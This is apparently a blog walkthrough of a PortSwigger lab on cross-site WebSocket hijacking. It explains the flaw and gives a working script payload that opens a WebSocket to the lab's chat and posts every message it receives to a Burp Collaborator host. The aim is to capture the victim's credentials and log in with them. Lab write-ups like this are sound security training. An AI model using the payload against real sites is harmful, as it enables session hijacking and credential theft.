Cross-site WebSocket hijacking

Portswigger Lab Solution — Cross-site WebSocket hijacking | Karthikeyan Nagaraj

What is cross-site WebSocket hijacking?

Cross-site WebSocket hijacking (also known as cross-origin WebSocket hijacking) involves a cross-site request forgery (CSRF) vulnerability on a WebSocket handshake.

It arises when the WebSocket handshake request relies solely on HTTP cookies for session handling and does not contain any CSRF tokens or other unpredictable values.

An attacker can create a malicious web page on their own domain which establishes a cross-site WebSocket connection to the vulnerable application. The application will handle the connection in the context of the victim user’s session with the application.

The attacker’s page can then send arbitrary messages to the server via the connection and read the contents of messages that are received back from the server.

This means that the attacker gains two-way interaction with the compromised application.

Analysis:

1. In Burpsuite Turn your Intercept Off and turn On your Proxy in Browser

2. On Inspecting the http History of the Web socket we get to know that the request has a CSRF Token

3. Copy the Collaborator ID from Burp

4. Paste the below code in the Body of the Exploit Server with your web socket link and Collaborator's Link. Make sure to change the url

https://0a9500cd046a7e4ec152eafb00da000a.web-security-academy.net/chat to
wss://0a9500cd046a7e4ec152eafb00da000a.web-security-academy.net/chat

<script>
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

Completed Payload

<script>
    var ws = new WebSocket('wss://0a9500cd046a7e4ec152eafb00da000a.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://ciyjlsw9fxfbd0lw1n56iodvxm3cr1.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

5. Add the Required details and Click View Exploit

6. We are getting responses,

7. Click on Deliver to Victim. Here you’ll notice that we got some request and responses from the victim which has the Credential

8. Solve the Lab by Login with those credentials which we found

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng